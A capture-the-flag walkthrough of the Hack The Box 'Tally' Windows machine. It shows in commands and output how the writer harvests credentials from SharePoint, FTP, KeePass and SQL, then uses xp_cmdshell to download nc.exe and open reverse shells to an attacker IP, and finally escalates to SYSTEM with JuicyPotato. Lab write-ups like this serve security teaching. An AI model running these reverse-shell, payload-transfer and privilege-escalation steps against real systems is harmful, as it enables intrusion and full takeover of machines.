HTB - Tally

Tally

Getting Root

1. We find some files on share-point which have credentials to the FTP server

2. From FTP we get a KeePass database file with credentials that allow us to get a zip file from smb and that file has credentials to the SQL server which allows us to get a shell using xp_cmdshell

3. The user sarah has the SeImpersonatePrivilege which is easily exploitable using the rotten potato/juicypotato

Tools Used:

nmap, dirsearch.py, keepass2john, zip2john, impacket-mssqlclient.py, impacket-smbserver, juicypotato

Nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 20:22 EDT                                                                                                                               
Nmap scan report for tally.htb (10.10.10.59)                                                                                                                                                  
Host is up (0.12s latency).                                                                                                                                                                   
                                                                                                                                                                                              
PORT      STATE SERVICE            VERSION                                                                                                                                                    
21/tcp    open  ftp                Microsoft ftpd                                                                                                                                             
| ftp-syst:                                                                                                                                                                                   
|_  SYST: Windows_NT                                                                                                                                                                          
80/tcp    open  http               Microsoft IIS httpd 10.0                                                                                                                                   
| http-ntlm-info:                                                                                                                                                                             
|   Target_Name: TALLY                                                                                                                                                                        
|   NetBIOS_Domain_Name: TALLY                                                                                                                                                                
|   NetBIOS_Computer_Name: TALLY                                                                                                                                                              
|   DNS_Domain_Name: TALLY                                                                                                                                                                    
|   DNS_Computer_Name: TALLY                                                                                                                                                                  
|_  Product_Version: 10.0.14393                                                                                                                                                               
|_http-server-header: Microsoft-IIS/10.0                                                                                                                                                      
| http-title: Home                                                                                                                                                                            
|_Requested resource was http://tally.htb/_layouts/15/start.aspx#/default.aspx                                                                                                                
81/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                                    
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                                   
|_http-title: Bad Request                                                                                                                                                                     
135/tcp   open  msrpc              Microsoft Windows RPC                                                                                                                                      
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn                                                                                                                              
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds                                                                                                       
808/tcp   open  ccproxy-http?                                                                                                                                                                 
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM                                                                                                               
| ms-sql-ntlm-info:                                                                                                                                                                           
|   Target_Name: TALLY                                                                                                                                                                        
|   NetBIOS_Domain_Name: TALLY                                                                                                                                                                
|   NetBIOS_Computer_Name: TALLY                                                                                                                                                              
|   DNS_Domain_Name: TALLY                                                                                                                                                                    
|   DNS_Computer_Name: TALLY                                                                                                                                                                  
|_  Product_Version: 10.0.14393                                                                                                                                                               
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback                                                                                                                                      
| Not valid before: 2020-04-05T22:22:49                                                                                                                                                       
|_Not valid after:  2050-04-05T22:22:49                                                                                                                                                       
|_ssl-date: 2020-04-06T00:25:52+00:00; +56s from scanner time.                                                                                                                                
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                                                                    
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                                   
|_http-title: Not Found                              
15567/tcp open  http               Microsoft IIS httpd 10.0                                                                                                                                   
| http-auth:                                                                                                                                                                                  
| HTTP/1.1 401 Unauthorized\x0D                                                                                                                                                               
|   Negotiate                                                                                                                                                                                 
|_  NTLM                                                                                                                                                                                      
| http-ntlm-info:                                                                                                                                                                             
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2020-04-06T00:25:51+00:00; +55s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  storagecraft-image StorageCraft Image Manager
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              Microsoft Windows RPC
49665/tcp open  unknown
49666/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
49669/tcp open  msrpc              Microsoft Windows RPC
49670/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 55s, deviation: 0s, median: 54s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-06T00:25:00
|_  start_date: 2020-04-05T22:22:09

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.20 seconds

Enumeration

HTTP - Port 80

Dirsearch.py

#python3 /opt/dirsearch/dirsearch.py -u http://tally.htb -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -E                                                               
                                                                                                                                                                                              
 _|. _ _  _  _  _ _|_    v0.3.9                                                                                                                                                               
(_||| _) (/_(_|| (_| )                                                                                                                                                                        
                                                                                                                                                                                              
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 1708                                                                                  
                                                                                                                                                                                              
Error Log: /opt/dirsearch/logs/errors-20-04-05_23-09-45.log                                                                                                                                   
                                                                                                                                                                                              
Target: http://tally.htb  
[23:16:08] 302 -  143B  - /_layouts/viewedit.aspx  ->  /_layouts/15/viewedit.aspx                                                                                                             
[23:16:08] 302 -  143B  - /_layouts/viewlsts.aspx  ->  /_layouts/15/viewlsts.aspx                                                                                                             
[23:16:08] 302 -  143B  - /_layouts/versions.aspx  ->  /_layouts/15/versions.aspx 

Visiting /_layouts/viewlsts.aspx provides some interesting results.

Found Documents with Cred

The Documents folder had a file with FTP details

FTP details:

Password: UTDRSCH53c"$6hys

Checking under Site Pages, we noticed another file named Finance Team

Looking at the contents of the file, we notice the username ftp_user

FTP - Port 21

We can successfully login using ftp_user and the password we found earlier.

# ncftp -u ftp_user -p 'UTDRSCH53c"$6hys' 10.10.10.59
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.59...                                                                                                                                                                  
Microsoft FTP Service
Logging in...                                                                                                                                                                                 
User logged in.
Logged in to 10.10.10.59.                                                                                                                                                                     
ncftp / > ls
From-Custodian/  Intranet/        Logs/            To-Upload/       User/
ncftp / > 

Found KeePass File

Under /Users/Tim we find a keepass file named tim.kdbx

ncftp /User/Tim > cd Files/                                                                                                                                                                   
ncftp /User/Tim/Files > ls                                                                                                                                                                    
bonus.txt      KeePass-2.36/  tim.kdbx    

Cracking the KeePass password

# keepass2john tim.kdbx > tim_hash
# sudo john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt tim_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
simplementeyo    (tim)
1g 0:00:00:11 DONE (2020-04-06 01:09) 0.08718g/s 2153p/s 2153c/s 2153C/s simplementeyo..sept17
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Username: Finance Password: Acc0unting

SMB - Port 445

Checking the credentials using cme works and we also notice that we have read access to the ACCT share.

# crackmapexec smb 10.10.10.59 -u finance -p Acc0unting --shares
SMB         10.10.10.59     445    TALLY            [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB         10.10.10.59     445    TALLY            [+] TALLY\finance:Acc0unting 
SMB         10.10.10.59     445    TALLY            [+] Enumerated shares
SMB         10.10.10.59     445    TALLY            Share           Permissions     Remark
SMB         10.10.10.59     445    TALLY            -----           -----------     ------
SMB         10.10.10.59     445    TALLY            ACCT            READ            
SMB         10.10.10.59     445    TALLY            ADMIN$                          Remote Admin
SMB         10.10.10.59     445    TALLY            C$                              Default share
SMB         10.10.10.59     445    TALLY            IPC$                            Remote IPC

Found a zipfile

smb: \zz_Migration\Backup\20170808\orcharddb\> ls                                                                                                                                             
  .                                   D        0  Sun Sep  3 10:23:16 2017                                                                                                                    
  ..                                  D        0  Sun Sep  3 10:23:16 2017                                                                                                                    
  orcharddb.zip                       A     1012  Sun Sep  3 10:23:07 2017   

Cracking the zipfile

# zip2john orcharddb.zip > orchard_hash
# john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt orchard_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Acc0unting       (orcharddb.zip/orcharddb.sql)
1g 0:00:00:00 DONE (2020-04-06 02:24) 1.010g/s 11551Kp/s 11551Kc/s 11551KC/s Aimeerose83..Abdouhabibi
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Unzipping the file orcharddb.zip shows an sql file with some creds.

([Id], [UserName], [Email], [NormalizedUserName], [Password], [PasswordFormat], [HashAlgorithm], [PasswordSalt], [RegistrationStatus], [EmailStatus], [EmailChallengeToken])  
(2, N'admin', N'', N'admin', N'Finance2', N'Clear', N'SHA1', N's2Ieb5Pn7Vwf+X6JEXJitg==', N'Approved', N'Approved', NULL)

Found tester.exe

smb: \zz_Migration\Binaries\New Folder\> ls
  .                                   D        0  Thu Sep 21 02:21:09 2017
  ..                                  D        0  Thu Sep 21 02:21:09 2017
  crystal_reports_viewer_2016_sp04_51051980.zip      A 389188014  Wed Sep 13 15:56:38 2017
  Macabacus2016.exe                   A 18159024  Mon Sep 11 17:20:05 2017
  Orchard.Web.1.7.3.zip               A 21906356  Tue Aug 29 19:27:42 2017
  putty.exe                           A   774200  Sun Sep 17 16:19:26 2017
  RpprtSetup.exe                      A   483824  Fri Sep 15 15:49:46 2017
  tableau-desktop-32bit-10-3-2.exe      A 254599112  Mon Sep 11 17:13:14 2017
  tester.exe                          A   215552  Fri Sep  1 07:15:54 2017
  vcredist_x64.exe                    A  7194312  Wed Sep 13 16:06:28 2017

                8387839 blocks of size 4096. 714594 blocks available
smb: \zz_Migration\Binaries\New Folder\> get tester.exe 
getting file \zz_Migration\Binaries\New Folder\tester.exe of size 215552 as tester.exe (357.4 KiloBytes/sec) (average 357.4 KiloBytes/sec)
smb: \zz_Migration\Binaries\New Folder\> 



# strings tester.exe
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G; 

Creds:

sa:GWE3V65#6KFH93@4GWTG2G

Exploitation:

python /opt/impacket/examples/mssqlclient.py sa:'GWE3V65#6KFH93@4GWTG2G'@10.10.10.59 
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665) 
[!] Press help for extra shell commands
SQL> 

Getting a shell

SQL> help                                                                                                                                                                                     
                                                                                                                                                                                              
     lcd {path}                 - changes the current local directory to {path}                                                                                                               
     exit                       - terminates the server process (and this session)                                                                                                            
     enable_xp_cmdshell         - you know what it means                                                                                                                                      
     disable_xp_cmdshell        - you know what it means                                                                                                                                      
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell                                                                                                                              
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)                                                                                                             
     ! {cmd}                    - executes a local shell cmd                                                                                                                                  
                                                                                                                                                                                              
SQL> enable_xp_cmdshell                                                                                                                                                                       
[*] INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.                                                        
[*] INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.                                                                  
SQL> enable_xp_cmdshell 1                                                                                                                                                                     
[*] INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.                                                        
[*] INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.                                                                  
SQL> RECONFIGURE     
SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

tally\sarah                                                                        

                               

Copy nc.exe to the box using impacket-smbserver

On my Kali Box
# impacket-smbserver share $(pwd)


On Tally
# SQL> xp_cmdshell net use p: \\10.10.14.55\share
# SQL> xp_cmdshell copy p:\nc.exe c:\temp
# SQL> xp_cmdshell c:\temp\nc.exe -e cmd.exe 10.10.14.55 9001


On my kali box, I get a shell
# rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:49907.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Privilege Escalation

The user sarah has some privileges that can be abused using JuicyPotato

c:\TEMP>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We copied the JuicyPotato to the target using the same method we used for nc.exe when executed, we didn't get a shell. However after trying different CLSID, we got a shell

CLSID that worked: UsoSvc {E7299E79-75E5-47BB-A03D-6D319FB7F886} {B91D5831-B1BD-4608-8198-D72E155020F7}

http://ohpe.it/juicy-potato/CLSID/

c:\TEMP>.\jp.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9005" -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
.\jp.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.55 9005" -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
Testing {7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381} 1337
......
[+] authresult 0
{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\TEMP>

Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9005
Ncat: Listening on 0.0.0.0:9005
Ncat: Connection from 10.10.10.59.
Ncat: Connection from 10.10.10.59:49979.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>